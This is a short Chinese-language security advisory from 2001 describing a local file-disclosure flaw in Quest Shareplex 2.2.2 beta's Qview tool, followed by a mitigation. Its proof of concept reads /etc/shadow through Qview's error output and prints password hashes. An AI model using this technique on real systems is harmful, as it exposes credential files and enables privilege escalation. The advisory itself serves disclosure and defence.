Shareplex存在任意本地文件可发现漏洞发布时间:2001-04-07 更新时间:2001-04-07 严重程度:高 威胁程度:读取受限文件 错误类型:设计错误 利用方式:服务器模式 受影响系统 Quest Shareplex 2.2.2 beta详细描述 Shareplex是Quest软件中数据库复制工具,某些版本存在 一般用户允许读本地任意文件漏洞。问题是Shareplex的Qview允许它的用户指定包含Qview命令的文件作为输入,如果文件内容不是合法Qview命令,他们就会输出错误信息作为标准错误,利用这个特性,攻击者可以获得一些敏感文件中的信息。 测试代码 $ id uid=500(foo) gid=200(bar) $ cd <path to shareplex binaries> $ ./qview qdump> cmd /etc/shadow Executing: root:xDmyz1K9xRKRo:11236:::::: invalid command root:xDmyz1K9xRKRo:11236:::::: ... Executing: splex:BdJCfh1D32hzo:11290:::::: invalid command splex:BdJCfh1D32hzo:11290:::::: Executing: foo:2MQXUgAcnOcEU:11344:::::: invalid command foo:2MQXUgAcnOcEU:11344:::::: qdump> quit $ 解决方案 临时解决方法: 当前,qview需要以root身份来运行,但是可以通过把qview的 属性改为4550来降低某些危险,并把它归属于某一个特殊组。 相关信息 |
